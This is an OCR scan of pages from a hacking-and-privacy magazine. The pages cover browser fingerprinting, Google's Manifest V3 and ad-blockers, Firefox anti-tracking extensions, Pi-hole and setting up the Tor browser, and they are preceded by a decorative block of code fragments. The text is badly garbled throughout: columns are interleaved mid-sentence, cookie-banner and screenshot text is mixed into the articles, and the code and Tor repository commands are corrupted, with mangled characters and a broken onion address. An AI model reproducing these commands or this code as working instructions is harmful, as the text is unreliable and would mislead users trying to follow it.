you've created to store all recovered files. While the heavy lifting is done by the powerful command-line
Armed with this info, Photorec will get to work and can open source tools and utilities, Rescatux makes them
take a while depending on the size of the partition. All the files accessible to inexperienced users thanks to its home-brewed
it finds are stored in the folder you pointed it to. When you menu-driven Rescapp utility. ■

The Hacker's Manual | 43


: 0) {S x{Si]: Secret jf$stari Sstai\ ], $screen->refi esh; usleer 00; gt ‘therub^
^^9 JSSF I I I fek
9 9 I I I
^^^^9 I H ^9^
9
^Kn^B^B I B^Hk

reen->addch($st^9Ji| HM 99
I ^1 W^B^I 19
I
99
^^^kwBB 9 --- ^^
I |^
^■B B^B BIB M ™„ nmn ^_
9 9 B B ^k 9 9
9 9 ^k
Sals IEbb W* B ^b^^L
BWbB 9 9 9 9
■ w 91 IJK E ^1 ■ gEELJ^S JS &i I
■M
I I
B ^B
I
WB MH
^BWWI B S’ ^B &
WB HI^R^B
aprocessable_entity} $ bw .9B9B9. ^9M^. _g|. ^_^j__ , ^g Emigrate $

^9

ite_attributes(params[:task]) format.html 9
9 9hhbBsk^W
| ^9 :o9
^HBi^b9Rlse
9 bbh^9b ^^B ^^9 format.html {render action: “edit”} formatjson {rei
sc rails generate migration add_priority_to_tasks priority.integer $ bundle exec rake db:migrate $ bundle exec rake db:migrate $ bundle exec rails server validate
at, ‘is in the past!’) if due_at < Time.zone.now #!/usr/bin/en python import pygame from random import randrange MAX.STARS = 100 pygame.init() screen = py
ars = for i in range(MAXJSTARS): star = [randrange(0,639), randrange(0,479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.
humstars = 100; use Time::HiRes gw(usleep); use Curses; Sscreen = new Curses; noecho; curs_set(0); for ($i = 0; Si < Snumstars ; $i++) {$star_x[$i] = rand(80); $s
clear; for ($i = 0; $i < Snumstars ; $i++) {$star_x[$i] -= $star_s[$i); if (Sstar_x($i] < 0) {$star_x[$i] = 80;} $screen->addch($star_y[$i], $star_x[$i], “.”);} $screen->refre
rent, lest do gem “rspec-rails”, “~> 2.13.0” S gem install bundler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist --skip-test-unit respond
nl {redirect_to ©task, notice: *...’) formatjson {head :no_content) else format.html {render action: “edit”} formatjson {render json: @task.errors, status: :unprc
ity_to_tasks priority integer $ bundle exec rake db:migrate $ bundle exec rake db:migrate $ bundle exec rails server validate :due_at_is_in_the_past def due_at_is_
ine.now #!/usr/bin/en python import pygame from random import randrange MAX_STARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) c
star = [randrange(0, 639), randrange(0, 479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.event.getQ: if event.type = pyg
tes qw(usleep); use Curses; $screen = new Curses; noecho; curs_set(0); for ($i = 0; Si < Snumstars ; $i++) {$star_x[$i] = rand(80); $star_y($i] - rand(24); $star_s[$i]
s ; $i++) { $star_x($i] -= $star_s[$i]; if ($star_x[$i] < 0) { $star_x($i] = 80;} $screen->addch($star_y[$i], $star_x{$i], “.”);} $screen->refresh; usleep 50000; gem “then
Is”, “~> 2.13.0” $ gem install bundler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-unit respond_to do Iformatl if @task.update_
’} format.json {head :no_content} else format.html {render action: “edit”} format.json {render json: @task.errors, status: :unprocessable_entity} $ bundle exec rails
exec rake db:migrate $ bundle exec rake db:migrate $ bundle exec rails server validate :due_at_is_in_the_past def due_at_is_in_the_past errors.add(:due_at, ‘is in tf
rgame from random import randrange MAX_STARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) clock = pygame.time.Clock() stars = :
3(0, 479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type = pygame.QUIT: exit(O) #!/usr/bin/perl $nt
■ new Curses; noecho; curs_set(0); for ($i = 0; Si < Snumstars ; $i++) { $star_x($i] = rand(80); $star_y($i] = rand(24); $star_s[$i] - rand(4) + 1;} while (1) { $screen-
]; if ($star_x[$i] < 0) { $star_x($i] = 80;} $screen->addch($star_y[$i], $star_x[$i], “.”);} $screen->refresh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group :de\
ndler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist --skip-test-unit respond_to do Iformatl if @task.update_attributes(params[:task]) forma'
nt} else format.html {render action: “edit”} format.json {render json: @task.errors, status: :unprocessable_entity} $ bundle exec rails generate migration add_priori1
exec rake db'.migrate S bundle exec rails server validate :due_at_is_in_the_past def due_at_is_in_the_past errors.add(:due_at, ‘is in the past!’) if due_at < Time.zon
ndrange MAXJSTARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) clock = pygame.time.Clock() stars = for i in range(MAX_STARS): star =
snd(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type = pygame.QUIT: exit(O) #!/usr/bin/perl $numstars = 100; use Time::HiRes qw(us
($i = 0; $i < $numstars ; $i++) { $star_x($i] = rand(80); $star_y{$i] = rand(24); $star_s[$i] = rand(4) + 1;} while (1) { $screen->clear; for ($i = 0; $i < Snumstars ; $i++)
reen->addch($star_y(Si], $star_x[$i], “.”);} $screen->refresh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group development, lest do gem “rspec-rails”, “~> 2.13.0
Security
The best defence is a good
offence, but also a good defence.
46 Protect your privacy
Discover what threats are out there and
what you can do to protect your devices.

54 Kali Linux
We take you inside the ultimate hacking
toolkit and explain how to use it in anger.

58 Secure chat clients


Chat online without anyone snooping in on
what you have to say.

64 Lock down Linux


We outline the essentials of locking down
your Linux boxes for secure networking.

68 Data recovery
Recover files from damaged disks and
ensure deleted items are gone for good.

72 Key management
Learn how to create a good GnuPG key
and keep it safe from online thieves.

>clear; for ($i = 0; $i < $numstars ; $i++) { $star_x[$i] -=


relopment, lest do gem “rspec-rails”, “~> 2.13.0” $ gem
t.html {redirect_to @task, notice: } format.json {head
y_to_tasks priorityanteger $ bundle exec rake dbrmigrate
e.now #!/usr/bin/en python import pygame from random
: [randrange(0, 639), randrangefO, 479), randrangefl, 16)]
sleep); use Curses; Sscreen = new Curses; noecho; curs_ The Hacker's Manual | 45
{$star_x[$i] -= $star_s[$i]; if ($star_x[$i] < 0) { $star_x[$i]
” $ gem install bundle: $ gem install rails -version=3.2.12
Prate.
orivac
In a world where the concept of online privacy is an
afterthought at best, David Rutland looks at the
hazards of the digital landscape and what you can
do to protect yourself. M
ew people like being tracked online. Sure, there are

F some legitimate reasons for it: you may be a threat


to national security - busily searching up
combustible materials, bidding for the infamous and
stylish Casio F-81W on eBay, or meeting up with your
fellow government-toppling anarchists on Facebook
(although no one is better at overthrowing HMG than
HMG). We’re sure there are warehouses full of counter­
terrorist officers sitting behind ancient CRT
monitors, watching the humdrum daily
activities of suspected terrorists as they scroll
through 60-second TikToks, work on mind-
numbing romance novels, and call their
grandmas on WhatsApp to make sure they've
remembe-ed to take their meds and have
enough milk. A James Bond lifestyle it ain't.
In reality most tracking takes place with
little or no human interaction, and is for ■
commercial purposes. Your data is sold, ■_.
rented or other otherwise surrendered for
Protect your privacy
cash. If you have a Google account and use Chrome, for
instance, everything you do online is synced across Reach
Google. If you use a Google handset, that data is tied to We value your privacy

your real-world activity, the locations you visit and the We and our partners store or access information on devices, such as cookies and process personal data, such as
unique identifiers and standard information sent by a device for the purposes described betaw. You may ckk to
contacts you call or text. consent to our and our partners’ processing for such purposes Alternatively, you may cbck to refuse to consent, or
access more detailed information and change your preferences before consenting Your preferences will apply to
In addition to the well-known perils of cookies and this website only. Please note that some processing of your personal data may not requwe your consent, but you
have a nghr to object to such processing You can :hange your preferences at any time by returning to this site or
beacons, which track you across internet, there are the visit our privacy policy.

browser fingerprinters that use nefarious methods to REJECT ALL ACCEPT ALL

pinpoint your device with alarming specificity.


Ditching Google and the Android mobile operating
system should be the first step you take to preserve
your online privacy. At the very least, you should be
using a privacy-respecting browser such as Brave or a
hardened Firefox, with ad-blockers and anti-tracking
plugins. Even better, Tor 12 alpha is out, making it easier
for you to bounce your traffic around the world.
T: W: ( 35% at 192.168.1.240) FULL 100.00% 570.1 G1B 0.81 6.2 Gi8 I 6.9 GiB 19-1
Fear not, because we’re here to bulk up your
defences and make it much more difficult for snoopers
and creeps to know what you're up to online. right to process this data if you grant consent or if the > Consenting
company has a legitimate interest. allows trackers
to strip-mine
Browser fingerprinting It’s because of this that you see irritating cookie
your browser for
Unless you’ve been living in a cave for the past 30 consent pop-ups almost everywhere you go on the
data, in addition
years, you’ll be aware of the role cookies play in helping web. A lot of websites have these, but some don’t.
to polluting
tracking companies to, erm, keep track of you. You may click Accept because you don’t care or your device with
These tiny files contain a unique identifier and can because you think that as you’re browsing in a private cookies. Don't
be inspected by the website that placed them - or window, cookies will be automatically wiped when do it!
occasionally by other websites and services. you close that window. You’re correct, but visit the
By itself, this isn’t necessarily a bad thing. Websites homepage of any ‘free’ online version of a major UK
that provide a login or shopping cart need to know that newspaper, and have a quick read through of the GDPR
you’re logged in and have recently added six kilos of consent pop-up. You’ll notice that it’s not just cookies
fertiliser and a couple of car batteries to your basket. you’re agreeing to.
But when cookies that can identify you across sites On the Daily Star’s website (currently showing a wet
are used, privacy becomes an issue; tracking networks lettuce), you’ll notice the consent notice is provided by
that control the cookies can tell precisely which sites a company called Reach, which also owns various
you’ve visited and what you did while you were there. Mirror Group titles. The second paragraph reads, “We
Our morning has involved scanning the headlines at and our partners may use precise geolocation data and
various news outlets, checking emails, comparing dog identification through device scanning.”
worming brands and perusing possible November This device scanning - also known as fingerprinting
getaways on caravan sites in north-west England. - takes a number of metrics to assign you a unique
We have no idea whether those sites have cookies identifier. These include IP address, system fonts
that can track across the web, but Firefox's default installed, OS, screen resolution, battery information,
setting is to block third-party cookies, and the searches time zone, canvas draw time and language settings.
were conducted in a private window, so this writer’s None of these attributes are unique on their own, but
anniversary plans are safe. Or are they? taken together, they identify exactly who you are, and
Taken together, the General Data Protection depending on the text of the consent form, you may be
Regulation (GDPR) and the ePrivacy Directive class allowing them to infer connections across devices, as
cookies as personal information because they can well. You don’t stay private and anonymous online by
help identify individuals, and companies only have a sitting there doing nothing - you have to be proactive.

How identifiable are you?


Browser fingerprinting works because machines using it. You’re further run for 30 seconds. We discovered that
very few computers are set up to be identified by the fact that you our personal laptop was completely
identical. Sure, in Linux Format Towers, (presumably) use Linux, making you unique, making it incredibly easy.
we sit in rows behind identical grey part of the elite 1% globally. If you’re One in 189 browsers has the same
boxes running the exact same OS, using one of the more esoteric distros WebGL Vendor and Renderer, one in 16
software, language packs and IP or DEs, you’re even more identifiable. has the same audio fingerprint, one in
address, but once we're home, the The Electronic Frontier Foundation four has the same number of CPU cores
situation is very different. developed Cover Your Tracks to help and one in nine runs on Linux x86_64.
The first giveaway is your IP address. you to discover exactly how unique you Those characteristics are shared by
Even if you live and work in a factory are, and how that can help ad corps to one in every 30,000 browsers, but it
dorm, that IP address isn’t going to track you without needing to use gets worse. Try it for yourself at:
have more than a couple of hundred cookies. Click a button and let the test https://coveryourtracks.eff.org.

The Hacker's Manual | 47


Security

The end of ad-blockers


Manifest V3 will cripple or kill ad-blockers for Chrome, Edge,
Opera and more. Why would Google do that?
d-blockers have been around
chrome web store $

A
it
for decades. They create a
much better reading Home > Extensions > uBlock Origin Lite

experience (shhh, TechRadar is


uBlock Origin Lite Available on Chrome
listening!—Ed) as you’re not constantly
★ ★ ★ ★ ★ 31 0 Productivity 8.000* trtora
bombarded by visual junk,
autoplaying videos and mysterious
sounds emanating from one of your Privacy practice* Support Related

72 open tabs.
Although it may appear
otherwise, adverts are not actually
on the site you visit in your browser.
The website provides a basic
HTML document that contains
instructions for formatting, locations
from which to retrieve images, and > UBlock Origin will struggle on with uBlock Origin Lite, which somehow still
how to fetch and display other manages to block ads while obeying the Google diktat. But for how long?
resources. Adverts are one such
resource and are pulled from a there’s no guarantee the maintainers won’t slip in some
remote location on kind of malware in future, or the project won’t be taken
the server of an advertising company. over by an evil villain. We’re not scaremongering, it
The URLs of these ad servers are generally well happens - most notably to the uBlock Origin fork Nano
known and have been compiled into dozens of lists Defender, which, after it was sold, incorporated a
that can be downloaded by you or your PC. forked connect.js file, which submitted user data and
When an ad-blocking extension is installed in a activity to remote servers. Extensions have also been
browser such as Google Chrome, resource requests used as trojans, viruses, keyloggers and other nasties.
are passed through the extension, which then retrieves Google’s big idea, first mooted in 2020, is part of its
the resource, which can be an image, advert or another so-called Privacy Sandbox model, which it says enables
page. If the URL is known to belong to an advertising “publishers and developers to keep online content
or tracking company, the advert isn’t fetched. Simples. free”, while enabling people to “enjoy their browsing
Except it’s not. Browser extensions are a risky and app experience without worrying about what
proposition at the best of times, and ones that have personal information is collected, and by whom”. All
access to all your web traffic have the potential to be very noble, we’re sure. Put simply, Google aims to
very dangerous indeed. Even if your go-to keep all user data within its own platform and offer
ad-blocker is ethically developed and open source, advertisers access to user metadata.
Currently, extensions for both Chrome and Firefox­
based browsers are built around Google’s Manifest V2,
Ublock isn’t going which offers developers the option of using an
ephemeral background-based ora persistent
background page. Manifest V3 restricts what
If you’re a Chromium addict and can't get enough of Google products
extensions can do in Chrome by making them use
(unlikely, we think), it will still be possible to block ads on Chrome once
Manifest V2 is deprecated but it’ll be fiddly and limited. service workers - ephemeral, event-based JavaScripts
UBIock Origin Lite has been specifically developed with Manifest V3 that run in the background and don’t have access to
in mind and is fully compliant with Google’s new rules. the standard website API. They can’t execute code
According to the devs, "UBOL does not require broad read/modify and they can only run for a limited time.
data permission at install time, hence its limited capabilities out of the While extensions built on Manifest V2 can read
box compared to uBlock Origin or other content blockers requiring and modify your traffic (which is necessary for an
broad read/modify data permissions at install time,” and you need to ad-blocker to function) using the chrome.webrequest
explicitly grant extended permissions on specific sites. permission, Manifest V3 does away with this capability,
UBIcck Origin Lite is still a work in progress, and seems to be replacing it with chrome.declarativeNetRequest. This
effective so far, but it’s a sticking-plaster measure at best. permission can still modify your web traffic, but does it
blind - without ever seeing what that data is, and must

48 | The Hacker’s Manual


Protect your privacy
being able to zoom in on an individual. This idea was
Manifest V3 resources
eventually scrapped, and in January 2022, Google
Manifest V3 is part of a shift in the philosophy behind user security and privacy. The introduced the Topics API, which would see
following articles provide an overview of Manifest V3, the reasons behind it, and how
to approach it;
Chromium-based browsers identify five of your
interests and serve advertising based on those.
Platform vision
Explains how the Manifest V3 changes fit into the big picture of where the platform
By eliminating personal information from the
is going. equation, Google can justify removing ad-blocking
OvervLewof Manifest V3
functionality. Advertising companies aren’t tracking
Summarizes the technical changes introduced with Manifest V3.

Migration guide
you any more, so it’s safe to allow adverts through. It
Describes how to get started updating Manifest V2 extensions so they work in works as a rationale, but it’s sure to annoy internet
Manifest V3.

Migration checklist
users everywhere.
Provides a quick checklist to help adapt your extension to Manifest V3.

emember your preferences. and optimize your experience doto.i-. Q* H


Just ditch Chrome
Most browsers are based on Google’s Chromium
Google makes it easy for developers to switch to engine, including Chrome, Microsoft Edge, Opera and

I Manifest V3, but it's unclear how many will want to, Chromium itself - and all will be affected in some way
when Google completely disables Manifest V2 APIs in
declare, ahead of time, based on a very limited set of January 2023.
Google-defined rules. It stops extensions analysing One Chromium-based exception is Brave, which
individual requests, making most ad-blockers useless. doesn’t rely on extension APIs to block tracking and
Extensions won’t be able to load remote code either
- and all code must be approved by Google before the
extension is made available to users. Google’s motivation
This means you’re not going to fall victim to a dodgy
extension stealing your bank details or executing “It’s excruciatingly difficult to
arbitrary code to spoil your day, so, yes, it’s fair to say
that, in one way at least, Google is acting to protect
believe that Big G’s primary aim is
your security and privacy.
But if we’re being real for a second here, Google is a
to protect your privacy.”
surveillance advertising business - a phrase you have
doubtless read in these pages before and will again. ads, so ad-blocking should continue as normal. No
This means the more the company knows about guarantees, though - if Brave gains enough ground to
you, the more money it can make by targeting adverts thwart Google’s plans, Google may change the rules in
specifically to you. Its other businesses - Search, Maps, a way that harms Brave specifically.
Android, Gmail and Google Docs - are ancillary to this. A better option would be to use Mozilla’s Firefox
With that in mind, it’s excruciatingly difficult to believe instead, which has committed to supporting Manifest
that Big G’s primary aim is to protect your privacy. V2 indefinitely. This means that existing ad-blocking
extensions will still work and should continue to work
Why Google, why?! for ever.
We imagine that Google and its advertising businesses Firefox is currently the fourth most popular web
would have been quite happy doing business the way browser, boasting a 3.5% market share and coming in
they’ve always done it: matching people to their after Chrome (65%), Safari (18%) and Microsoft Edge,
interests and adverts accordingly. of all things (4%). Whether extension developers
Privacy organisations, including the Electronic consider it worth investing their blood, sweat and
Frontier Foundation and NOYB.EU, have been tears into such a small segment remains to be seen.
increasingly making angry noises at the way web
users are stalked through the internet jungle, like tom’sHARDWAI
hapless sightseers by a particularly hungry anaconda. I
The GDPR is one result of this and has resulted in
massive fines for dozens of corporations, including
Google, for failing to respect user privacy and data.
But campaigners in Europe would like to see more
safeguards in place - ideally, they would like no
tracking at all.
Ad-blockers have also become more competent
and ubiquitous in recent years. You don’t need to be
particularly technical to use one, and once it’s installed,
you can completely forget about it.
Google’s Privacy Sandbox is the company’s second
attempt to decouple individual users from the data it
collects while still maximising ad revenue. The first
effort, known as Federated Learning of Cohorts,
assigned individuals to a cohort that shared common
attributes and interests. Adverts would be served to > You wouldn't believe how many hoops we had to jump through to get a pic of
the cohort as a whole without the advertisers ever an ad on a website..

The Hacker’s Manual | 49


Security

Firefox extensions
Let’s defend our browsing with some pointy plugins
that’ll keep the wolves at bay.

he world isn’t going to end when Google pulls the

T plug on Manifest V2 for Chrome, so let's


investigate the very best anti-tracking and
ad-blocking extensions for Firefox. With Chrome and the
long-term viability of extensions on other Chromium-
based browsers in doubt, it's increasingly clear that Firefox
is the way forward.
We’d love to recommend Linux-specific browsers
such as Falkon, but the built-in adblock extension does
not have a stellar reputation for being user-friendly, and
Falkon's overall performance is not quite up there with
the best Mozilla has to offer. Perhaps the inevitable > Privacy Possum breaks embedded YouTube videos and
blocks downloads from certain sites. That doesn’t seem
exodus from the Googlesphere will prompt increased
like a downside...
investment in competent independent browser
development, but then again, maybe not. placeholders, so you don’t even register that
Firefox has another major advantage in the advertisements are missing.
upcoming browser wars: it’s truly multi-platform, with UBlock Origin can be turned on and off on a per-site
builds available for Windows, Mac OS, Android and iOS. basis - if, for some reason, you like viewing ads and
Linux-specific browsers have a tiny market share of being tracked - and individual elements can be
what is already a tiny market share, and worthy as they removed from a page with the click of a button.
may be, can’t attract the kind of massive investment
that is needed. Privacy Badger
As we said, Firefox will remain Manifest V2 UBlock Origin is a great anti-tracking extension, but its
compatible until the sun explodes, and all the primary purpose is as an ad-blocker. Privacy Badger,
extensions that currently help you to stay safe and from the Electronic Frontier Foundation, is a little
> While it's anonymous online will remain until the heat death of the different, and as with the remaining items on this list, its
reassuring to universe. Here's what you should be looking at... sole raison d'etre is to stop companies and individuals
know that we tracking you as you go about your daily routine.
have “strong uBlock Origin We say ‘‘routine’’ because Privacy Badger actually
protection
We’ve been using uBlock Origin on our personal does learn your routine. It learns your browsing habits
against web
machines since it came to our attention in May 2016 as and blocks tracking scripts and cookies in the
tracking”, it's
less comforting Mozilla's Extension of the Month. It’s the first and often background. If an advertiser seems to be tracking
to see our only add-on we install when we initialise a new machine. you across multiple domains, Privacy Badger blocks
unique browser Once the extension is installed and activated, that advertiser from loading any more content in your
fingerprint. you rarely even notice it’s there. It doesn’t leave ad web browser.
This demonstrates an obvious difference in
Cow Xxjf lacks x + 00
philosophy between Privacy Badger and ad-blocker­
C Qfi efforgrt»Jtsf&Mt-l&fp«_wbo<b“{‘v2i%lA{'pluginitSJA*Mu9«r*0%lA+C 0 & 0 f £
based anti-tracking extensions in that Privacy Badger
tr»ck>ng protection. The first tecton gives
you » general idea of what your browser
configuration is blocking (or not blocking). Our tests indicate that you have strong recognises that the internet as we know it today needs
Below that is a list of specific browser
charKteristci in the format that a tracker
protection against Web tracking. advertisements to function. It allows the ‘good adverts’
would view -.hem. we also provide
description, of bow they are incorporated
into your fingerprint. to be displayed - earning revenue for hard-working,
IS YOUR BROWSER:
ethical websites - while fooling unethical ad and
HOW CAN TRACKERS TRACK Blocking tracking ads? Yes tracking networks into thinking that you have
YOU?
Trackers use a variety of methods to
identify and track users. Mott often, this
Blocking invisible trackers? Yes disappeared entirely.
includes tra:k>ng cookies, but it can also Protecting you from fingerprinting? Your browser has a unique fingerprint
include browser fingerprinting. It has no built-in blacklists and, by default, Privacy
Fingerprinting is a sneakier way to track
users and n-akes it harder for users to
regain control of their browsers. Th«s report Still wondering how fingerprinting works? Badger does not block first-party trackers, such as the
measure, how easily tracker, might be
able to fihgwpriM your browser.
ones used by a site for analytics purposes. It’s only
LEARN MORE
once trackers start stalking you to a different site that
HOW CAN I USE MY RESULTS Arote. because tracking techniques are complex. subtle, and constsntly esolving Cover Your Tracks does not
TO BE MORE ANONYMOUS? measure all forms of tracking and protection. Privacy Badger takes action.
Knowing how easily identifiable you are. or
whether you are currently blocking A side effect of starting with a blank slate and
trackers, can help you know what to do
next to prottct your privacy. While most Your Results
trackers ear be derated by browser add­
Your browser fingerprint appears to be unique among the 219,363 tested in the past 45
blocking trackers based on behaviour is that ads will
ons or built-in protection mechanisms, the
sneakiest tuckers have ways around even days. slowly start to wink out of existence as their tracking

50 | The Hacker's Manual


Protect your privacy

Explore my Pi-hole
In all of this panic about browser-based and checks URLs against lists of known where you can update the blocklists,
ad-blockers and Google’s extension ad servers. If a URL is on the list, the block new URLs on a one-off basis and,
shenanigans, we neglected to mention resource (usually an advert) isn’t loaded. if you're especially sneaky, monitor what
our own preferred solution. Although Pi-hole was designed with the your kids are doing online.
Pi-hole was built to run on a Pi in mind, it runs happily on most One huge advantage Pi-hole has over
Raspberry Pi. It can run happily on a Pi hardware built since the millennium. If the traditional extensions is that you can set
Zero and sit behind your couch, drawing only spare machine you have is a Windows it up so your entire network is covered -
less wattage than a solar-powered box, you can install it using WSL. this is a big deal if everyone in your
torch. Installation is simple and, once set up, house has at least one PC, a phone and
Sitting between your browser and the you can access Pi-hole’s admin a streaming device. You can save hours.
wider internet, it intercepts all requests functions through a web interface, Days even.

becomes obvious. And as for what badgers have to do block each tracker either just on the current page or
with anything, we don't know. across the entire web. Ghostery doesn’t use blacklists
and leaves decisions in your hands.
Privacy Possum Ghostery is also very focused on performance
Privacy Possum is based on the excellent Privacy and improving user experience - by default, it
Badger and was created by one of the engineers who blocks trackers that slow down the web and unblocks
worked on the project. It takes a completely different trackers if blocking them breaks the web page you’re
approach to preventing companies from following you. attempting to access.
Put simply, it doesn’t. To our mind, however, this isn’t ideal, because it could
Privacy Possum allows trackers to stalk you all they lead to a situation in which tracking companies
want - but they’ll never ever be able to get an accurate deliberately create trackers that break websites if they
idea of who it is they’re following. are notallowed.
It blocks cookies that let trackers uniquely identify
you across websites. It blocks refer headers that reveal The bottom line
your browsing location. It blocks etag tracking, which Each of these anti-tracking extensions focuses on a
leverages browser caching to uniquely identify you. different area. UBlock Origin is for people who hate
And it blocks browser fingerprinting, which tracks the adverts and hate tracking; Privacy Badger is all about
inherent uniqueness of your browser. heuristic learning and making sure that trackers behave
Without these unique identifiers, it doesn’t matter themselves; Privacy Possum would prefer that tracking
who is tracking you, they will never be able to link any of companies go bust; while Ghostery is about a fast, clean
the information, and better yet - it actually costs them user experience.
money without giving anything in return. Which extension you go for is up to you, depending
Browser fingerprinting - using the attributes of your on which model best suits your needs. We like them all.
browser such as installed fonts, screen resolution and Earlier, we mentioned in passing that extensions > Aww, look:
language packs - is also spoofed, rather than hidden. occasionally change ownership or are deliberately Ghostery has
tiny Pac-Man-
To use an analogy, if the tracking companies or compromised by their developers in order to make a
style ghosts
government agents on your tail are looking for a quick buck from users. We seriously doubt that the
to illustrate
short, blonde woman with tattoos, Privacy Possum creators of uBlock Origin, Privacy Possum, Privacy
its spooky
transforms you into a 6’ 5” skinhead bloke with a flat Badger or Ghostery are going to sell out, but we credentials. And
cap and a natty moustache. Then it turns you into can’t guarantee it. Make sure you check the GitHub there’s even an
something else instead. repositories regularly for any reported problems or emoticon of a
Why possums? Possibly because they pretend to be changes in contributors. frightened cat!
dead. The extension creator hasn’t said.

Ghostery
Sounds spooky, eh? We love that it conjures up
images of us coasting across the internet unseen and
undetected, like some child of an exotic phantasm -
especially as this feature was written in the run-up
to Halloween.
Ghostery advertises itself as enabling “cleaner,
faster, safer browsing", and as its mascot, it has a
friendly little spook.
In reality, Ghostery isn’t that much different from
the other blockers and offers you control on a tracker-
by-tracker basis from a handy and visually pleasing
dashboard, which lists all of the trackers on the page
you’re viewing or interacting with. From there, you can

The Hacker’s Manual | 51


Security

Peeling open Tor 12


We might not be in a position to share state secrets with foreign
governments, but if we were, we'd use the Tor Browser.
sers who want to keep their private business secure during popular uprisings such as the Arab

U private when online often turn to VPN


(virtual private network) providers. It's a sensible

online privacy, it's SEO-optimised, VPN-promoting articles


Spring, dissident movements in Iran, Turkey and
Russia, as well as helping NSA leaker Edward Snowden
precaution, and when you search for terms related to exfiltrate state secrets from his workplace. It’s also
good for those engaged in normal, everyday activities,
that occupy the first few pages of results, because VPN but don't want to be watched.
companies pay out up to 60% for sales through affiliate
links. Want your online tech publication to flourish? VPNs Many layers
are where the cash is. Onion routing works by bouncing your connection
VPNs can hide your location and your activities, but between different routers so that they’re hard to track.
you need to pay for the privilege and create an account Let’s say that you’re sitting at home and want to
- and you can never be truly certain that the company read an article on http://9to5mac.com. Such is your
that takes your money isn’t straight up selling your shame that you can’t bear the thought of anyone even
details to data brokers, handing it over to the police or, knowing that you’ve connected to the 9to5Mac server.
If you just type the URL into your browser, your ISP
How tor operates knows you’ve visited the site, 9to5Mac’s ISP knows
you’ve visited the site, as do the admins of 9to5Mac
“Onion routing works by itself. Along the way, you will also have queried DNS
servers and there may even be snoopers on your own
bouncing your connection network who are interested in what you do online.

between different routers so that Potentially, there are dozens of individuals who are
now aware that you secretly long for an overpriced,
they’re hard to track.” underperforming slab of shiny metal on your desktop.
If you use Tor, all information, including your IP
worse, to Disney copyright lawyers. Everybody loves address, is wrapped in multi-layered encryption and
getting paid twice, right? sent through a network of randomly selected relay
Commercial VPNs are designed with a very specific servers. Each of these relays only knows a small
threat model in mind, and for most people looking for section of the route and not the entire journey. The
a level of anonymity which would allow them to sneak final stop on this journey is known as the exit node
subversive messages past government censors, for and it’s the exit node that makes the final connection
> Connecting to
instance, the Tor Network is where it’s at. to http://9to5mac.com.
the Tor network
Tor was born in the 1990s as The Onion Routing All nodes are provided by organisations and
can be as easy
project, from the minds of engineers at the US Naval individuals who volunteer their bandwidth and
as pressing a
button. It may
Research Lab, who wanted a way of connecting resources to the cause of internet anonymity.
take you a computers on the internet without revealing the parties Routing messages through Tor can be done in a
few attempts, involved - even if someone is monitoring the network. variety of ways, including email plugins, but the most
though. It’s been instrumental in keeping communications common method is by using the Tor Browser, which is
built on Firefox - the most recent release is the alpha
version of Tor 12.
C ©tor Browser NotConnected £? O Vf —

Set up Tor on your Linux desktop


The Tor Project offers official repositories for Ubuntu
Connect to Tor and Debian, which is handy if you want updates taken
Tor Browser routes your traffic over the Tor Network, run by thousands of volunteers around the care of automatically.
First install the apt transport:
Always connect automatically

Configure Connection... |
$ sudo apt install apt-transport-tor
...then add the following to /etc/apt/sources.list:
$ deb [signed-by=/usr/share/keyrings/tor-archive-keyring.
gpg] tor://apow7mjfryruh65chtdydfmqfpj5b
tws7nbocgtaovhvezgccyj azpqd.onion/torproject.org
<DISTRIBUTION> main
...for the stable version, or:

52 | The Hacker’s Manual


Protect your privacy
$ deb [signed-by=/usr/share/keyrings/tor-archive-keyring. > Captchas
gpg]tor://apow7mjfryruh65chtdydfmqfpj5b are used to
tws7nbocgtaovhvezgccyjazpqd.onion/torproject.org tor- prevent bots
nightly-main -<DISTRIBUTION> main from plaguing
the Tor network
...for the unstable version. Remember to replace
with spurious
<DISTRIBUTION> with the output of
requests for
Isbjelease -c
bridges. Get used
Now: to them - you’ll
$ sudo apt update be seeing a lot
$ sudo apt install tor deb.torproject.org-keyring more.
Alternatively, you can visit www.torproject.org/
download/ and grab the Linux version (it’s the one with
Enter a bridge
the penguin). Cancel

Honestly, that code is not something you want to


copy character by character from a magazine, so we
recommend just downloading it from the website. page took even longer, Once there, Tor worked how
When you start Tor for the first time, you have the you’d expect any browser to work.
option of connecting instantly by pressing the big Streaming media and torrents are big no-nos on the
purple button. This is probably fine for most people and Tor network. The project homepage explicitly requests
gives you a more than acceptable level of anonymity that you don’t do it. You’re using volunteer resources
with the default settings. If you’re in a country where and bandwidth, which could be put to better use than
Tor is blocked, you need to click on Configure checking out the new Arctic Monkeys album, and
Connection instead, then add a new bridge. besides, performance is terrible. Torrenting is frowned
Bridges are similar to ordinary Tor relays, but are not upon - unless you’re using those torrents to distribute
listed publicly, meaning it’s difficult for authorities to secret government documents, evidence of war crimes
shut them down or compromise them. There are few of or footage of drone attacks by the CIA.
them and your connection speed suffers, but if it’s your If you’re looking for a smooth internet experience,
only option, it’s your best option. Tor isn’t the tool you’re looking for. In addition to the
Because bridge addresses are not public, you need guidelines on streaming and torrenting, and the janky
to request them. Selecting Choose A Built-in Bridge connection, you’ll run into more Captchas than usual as
gives you the option of choosing Obfs4, which makes your traffic doesn’t look exactly how web pages expect
your traffic look random, Snowflake, which routes your it to. Your exit node can be anywhere in the world, so
connection through Snowflake proxies, or Meek-azure, you could also be served localised versions of web
which makes it look like you’re using a Microsoft site. pages, in Finnish, Armenian or Spanish.
You can also request a bridge from http://torproject. If on the other hand, you’re trapped under an
org, but be aware that you need to complete a Captcha authoritarian boot in a totalitarian state, Tor is just what
first. Once set up, you can hit Connect and be on your you need.
anonymous way.

Browsing with Tor Nothing is Tor-fect


Connecting to the Tor network may take a few
attempts and transfers may be slow, especially in these True security and anonymity is impossible on the internet. Any
